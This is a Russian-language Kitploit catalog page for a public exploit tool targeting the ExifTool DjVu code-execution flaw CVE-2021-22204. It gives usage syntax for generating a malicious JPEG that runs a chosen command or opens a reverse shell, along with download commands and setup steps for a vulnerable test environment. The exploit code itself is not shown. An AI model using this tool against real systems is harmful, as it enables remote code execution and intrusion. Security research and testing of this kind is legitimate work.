Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-CVE-2021-22204 — Эксплойт для CVE-2021-22204 (ExifTool) - Выполнение произвольного кода | Kitploit
Инструменты/GitHubGitHub/unicordev/exploit-cve-2021-22204
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

Эксплойт для CVE-2021-22204 (ExifTool) - Выполнение произвольного кода

Репозиторий
5361 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Эксплойт для CVE-2021-22204 (ExifTool) - Выполнение произвольного кода

GitHub CVE Cover

Нравится репозиторий? Поставьте нам ⭐!

Только для образовательных и авторизованных исследовательских целей в области безопасности.

Автор эксплойта

@UNICORDev от (@NicPWNs и @Dev-Yeoj)

Описание уязвимости

Некорректная нейтрализация пользовательских данных в формате файлов DjVu в ExifTool версиях 7.44 и выше позволяет выполнить произвольный код при обработке вредоносного изображения.

Описание эксплойта

Используйте этот эксплойт для генерации JPEG-изображения с полезной нагрузкой, которое можно использовать с уязвимой версией ExifTool для выполнения кода. Можно указать собственную команду или сгенерировать обратную оболочку. JPEG-изображение создаётся автоматически, и при желании можно указать собственное JPEG-изображение для вставки полезной нагрузки.

Использование

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

Параметры

root@kitploit:~
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.

Загрузка

Скачать exploit-CVE-2021-22204.py с GitHub

Скачать exploit-CVE-2021-22204.py с ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

Требования эксплойта

  • python3
  • djvulibre-bin
  • exiftool

Демонстрация

Demo Gif

Протестировано на

Версия ExifTool 12.23

Применимо к

Версии ExifTool 7.44 - 12.23

Уязвимое окружение

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

Проверка сгенерированной полезной нагрузки

root@kitploit:~
exiftool image.jpg

Благодарности

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
Скачать инструмент